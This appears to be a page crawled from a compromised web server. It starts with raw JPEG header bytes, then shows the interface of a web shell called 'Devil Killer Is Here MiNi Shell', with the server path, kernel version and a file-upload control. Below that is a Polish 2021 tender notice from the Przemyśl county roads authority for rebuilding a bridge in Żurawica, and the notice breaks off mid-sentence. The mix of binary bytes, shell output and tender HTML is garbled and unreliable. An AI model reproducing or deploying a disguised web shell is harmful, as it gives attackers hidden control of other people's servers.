JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210615/0008346001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00083460 z dnia 2021-06-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa mostu JNI 01003133 w ciągu drogi powiatowej nr 2124R w m. Żurawica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Przemyślu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650945384</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Dominikański, 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przemyśl</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdpprzemysl@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdpp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa mostu JNI 01003133 w ciągu drogi powiatowej nr 2124R w m. Żurawica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cf851a26-cdc5-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00083460</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000533/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa mostu JNI 01003133 w ciągu drogi powiatowej nr 2124R w m. Żurawica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zp.powiat.przemysl.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zp.powiat.przemysl.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">˜Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego,<br/>tj.bezpłatnierejestrując się lub logując, w przypadku posiadania konta w Platformie<br/>ZamówieńPublicznych,akceptuje warunki korzystania z Platformy, określone w Regulaminie<br/>zamieszczonym nastronieinternetowej https://zp.powiat.przemysl.pl/oraz uznaje go za wiążący.3.<br/>Ogólne zasadykorzystania zPlatformy:1) zgłoszenie do postępowania wymaga zalogowania<br/>Wykonawcy do Systemunasubdomenie https://zp.powiat.przemysl.pl/2) Wykonawca aby przystąpić do<br/>postępowaniamusizałożyć konto na Platformie https://zp.powiat.przemysl.pl/ gdzie zostanie<br/>powiadomiony omożliwościzalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada<br/>konto wykonująckroki procesurejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny, a<br/>następnie ustanawiahasło.3)Proces rejestracji Wykonawcy jest w pełni automatyczny, po<br/>zarejestrowaniu należy podaćdane firmy,którą osoba zakładająca konto reprezentuje.4) Po założeniu<br/>konta Wykonawca mamożliwość złożeniaOferty w postępowaniu. Komunikacja między Zamawiającym<br/>a Wykonawcami, wszczególnościzawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej zapośrednictwem Platformyi powiadomień mailowych.5) Zamawiający, zgodnie z §<br/>3ROZPORZĄDZENIE PREZESA RADYMINISTRÓWz dnia 30 grudnia 2020 r. w sprawie<br/>sposobusporządzania i przekazywania informacjioraz wymagań technicznych dla dokumentów<br/>elektronicznychoraz środków komunikacji elektronicznejw postępowaniu o udzielenie zamówienia<br/>publicznego lubkonkursie (dalej jako "Rozporządzenie")określa niezbędne wymagania sprzętowo -<br/>aplikacyjneumożliwiające pracę na Platformie Zakupowej,tj.: a) stały dostęp do sieci Internet o<br/>gwarantowanejprzepustowości nie mniejszej niż 512 kb/s,b)komputer klasy PC lub MAC, o<br/>następującej konfiguracji:pamięć min 2GB Ram, procesor Intel IV2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 10, MacOs x 10.4, Linux, lub ich nowszewersje,c) zainstalowana dowolna<br/>przeglądarka internetowa najlepiejnajnowszej dostępnej wersjiobsługująca TLS 1.2 z wyjątkiem<br/>Internet Explorer,d) włączona obsługaJavaScript,e) zainstalowanyprogram Acrobat Reader lub inny<br/>obsługujący pliki w formacie .pdf,f)podłączony lub wbudowany dokomputera czytnik karty<br/>kryptograficznej wydanej przez wystawcęcertyfikatu używanego przezWykonawcę.6) Zamawiający,<br/>zgodnie z § 3 powołanego powyżejRozporządzenia określa:a)dopuszczalne formaty przesyłanych<br/>danych, tj. plików o wielkości do 100MB w formatach: .doc, .pdf,.zip.b) informacje na temat kodowania i<br/>czasu odbioru danych: - plikzałączony przez Wykonawcę naPlatformie Zamówień Publicznych izapisany, widoczny jest w Systemie, jako zaszyfrowany – formatkodowania UTF8. Możliwość<br/>otworzenia pliku dostępna jestdopiero po odszyfrowaniu przezZamawiającego po upływie terminu<br/>składania ofert.c) oznaczenieczasu odbioru danych przezPlatformę stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wgczasu platformy, który jestsynchronizowany ze znacznikiem czasu UTC.4.<br/>Wykonawca powiniendokładnie zapoznać się zniniejszą SWZ i złożyć ofertę zgodnie z określonymi<br/>wymaganiami.5.Wszelkie oświadczenia, wnioski,zawiadomienia oraz informacje przekazywane będą<br/>elektronicznie zapośrednictwem dedykowanegoformularza udostępnionego na Platformie:<br/>zp.powiat.przemysl.pl6.Dokumenty, podmiotowe środkidowodowe oraz inne dokumenty lub<br/>oświadczenia muszą być złożonew formie elektronicznej lub wpostaci elektronicznej opatrzone<br/>podpisem zaufanym lub podpisemosobistym osoby upoważnionej doreprezentowania wykonawców<br/>zgodnie z formą reprezentacjiokreśloną w dokumencie rejestrowymwłaściwym dla formy organizacyjnej<br/>lub innym dokumencie orazskładane są przez Wykonawcę zapośrednictwem Formularza do<br/>komunikacji jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2<br/>rozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osóbfizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takichdanych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U.<br/>UE L119 z dnia4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:2. administratorem<br/>Pani/Pana danychosobowych jestDyrektor Zarządu Dróg Powiatowych w Przemyślu Plac Dominikański<br/>3 , 37-700Przemyśl3.administrator wyznaczył Inspektora Danych Osobowych : P. mgr Elżbieta Kalita z<br/>którymmożna siękontaktować pod adresem e-mail: zdpprzemysl@op.pl, .tel. 16 675-00-254. Dane<br/>osobowewykonawcybędą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>zprzedmiotowympostępowaniem o udzielenie zamówienia publicznego. 5. Odbiorcami<br/>przekazanychprzez wykonawcędanych osobowych będą osoby lub podmioty, którym zostanie<br/>udostępnionadokumentacjapostępowania zgodnie z art.74 ustawy Pzp, a także art. 6 ustawy z 6<br/>września 2001 r. odostępie doinformacji publicznej.6. Dane osobowe wykonawcy zawarte w protokole<br/>postępowaniabędąprzechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie<br/>zamówienia, ajeżeliczas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwaniaumowy.7.Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Panadotyczących jestwymogiem ustawowym określonym w przepisanych ustawy P.Z.P.,<br/>związanym zudziałem wpostępowaniu o udzielenie zamówienia publicznego.8. W odniesieniu do<br/>Pani/Pana danychosobowychdecyzje nie będą podejmowane w sposób zautomatyzowany, stosownie<br/>do art. 22 RODO.9.PosiadaPani/Pan:a) na podstawie art. 15 RODO prawo dostępu do danych<br/>osobowych Pani/Panadotyczących(w przypadku, gdy skorzystanie z tego prawa wymagałoby po<br/>stronie administratoraniewspółmierniedużego wysiłku może zostać Pani/Pan zobowiązana do<br/>wskazania dodatkowychinformacji mającychna celu sprecyzowanie żądania, w szczególności podania<br/>nazwy lub datypostępowania o udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie<br/>nazwy lub datyzakończonegopostępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO<br/>prawo dosprostowaniaPani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>możeskutkować zmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowieńumowy wzakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności<br/>protokołu orazjegozałączników);c) na podstawie art. 18 RODO prawo żądania od<br/>administratoraograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania<br/>postępowania oudzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w<br/>art. 18 ust. 2RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania,w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw<br/>innej osobyfizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiejlubpaństwaczłonkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>naruszaprzepisy RODO;10. Nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawodo usunięciadanych osobowych;b) prawo do przenoszenia danych osobowych, o którym<br/>mowa w art.20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych,gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO;11.Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne<br/>zRODOprzetwarzanie Pani/Pana danych osobowych przez administratora. Organem<br/>właściwymdlaprzedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP.IV.333-14/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa mostu JNI 01003133 w ciągu drogi powiatowej nr 2124R w m. Żurawica </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45221111-3 - Roboty budowlane w zakresie mostów drogowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">140 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1. Cena (koszt)	60%<br/>2.	Termin gwarancji i rękojmi	40%<br/>	Razem	100%<br/><br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej. <br/>CENA – 60%<br/>Cena będzie oceniana metodą punktową wg wzoru: <br/>Cena najniższa ze wszystkich ofert x 100pkt x Znaczenie kryterium 60%<br/>Cena oferty badanej<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/><br/>TERMIN GWARANCJI I RĘKOJMI – 40%<br/>Oferta w kryterium termin gwarancji i rękojmi może uzyskać od 0 do 40 pkt, przy czym oferta z najdłuższym okresem gwarancji otrzyma max 40 pkt. Pozostałym wykonawcom zostaną przyznane punkty wg następującego wzoru:<br/>Wartość punktowa = Rk Tn / Tmax<br/>Rk -	waga kryterium<br/>Tn -	termin gwarancji oferowany w aktualnie ocenianej ofercie<br/>Tmax -największa liczba punktów osiągnięta przez którąkolwiek z ofert w ramach kryterium nr 2<br/>Zamawiający przyzna punkty za termin gwarancji nie krótszy niż 48 miesięcy i nie dłuższy niż 60 miesięcy. W przypadku zaoferowania terminu krótszego niż 48 miesięcy Zamawiający przyzna 0 punktów bez poddawania porównywaniu z innymi ofertami. <br/>W przypadku zaoferowania terminu dłuższego niż 60 miesięcy Zamawiający do porównania przyjmie termin 60 miesięcy, natomiast Wykonawca będzie związany terminem zaoferowanym w ofercie.<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium termin gwarancji i rękojmi <br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów za termin gwarancji i rękojmi (maks. 40)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt. 8 II Rozdziału oraz spełniają na podstawie art. 112 określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie kwalifikacji zawodowych, jeżeli: Wykonawca wykaże że :<br/>- będzie dysponował w trakcie realizacji zamówienia min. 1 osobą - kierownikiem branży mostowej (posiadającym uprawnienia do kierowania robotami w specjalności mostowej) lub równoważne uprawnienia, wydane na podstawie wcześniej obowiązujących przepisów, które pozwalać będą na pełnienie funkcji Kierownika budowy w zakresie niniejszego zamówienia<br/>- wykonał roboty o wartości min. 500.000,00 zł brutto polegające na budowie, przebudowie lub remoncie mostu o rozpiętości min. 8 mb, obejmujące :<br/>wykonanie zbrojenia podpór, wykonanie podpór z betonu klasy C30/37, wykonanie zbrojenia płyt przejściowych, wykonanie płyt przejściowych z betonu klasy C30/37, wykonanie zbrojenia płyty pomostu i podpór, osadzenie kotew zamocowań barier, wykonanie żelbetowej płyty pomostu i podpór z betonu klasy C30/37 nad wodą , wykonanie konstrukcji stalowej/żelbetowej lub z belek typu DS/belek typu kujan , montaż barier ochronnych <br/><br/>UWAGA:<br/>Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane nadane obywatelom państw członkowskich w rozumieniu art 4a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U z 2016 r., poz. 1725 t.j.). uznane na podstawie odrębnych przepisów, stosowanie do treści art. 12 a ustawy Prawo Budowlane .<br/>Ilekroć w opisie warunków udziału w postępowaniu mowa jest o uprawnieniach, to w przypadku osób będących obywatelami państw członkowskich oznacza to decyzję <br/>w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczpospolitej Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z właściwymi przepisami, w szczególności z Ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65 z późn. zm.) oraz Ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U z 2016 r., poz. 1725 t.j.).<br/>Wszystkie w/w osoby kadry technicznej muszą posługiwać się językiem polskim lub <br/>w przypadku braku znajomości języka polskiego przez w/w osoby, Wykonawca zobowiązany jest na własny koszt do zapewnienia tłumacza języka polskiego w celu stałego bieżącego i symultanicznego tłumaczenia w kontaktach pomiędzy Zamawiającym a personelem Wykonawcy. <br/><br/><br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi, wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi 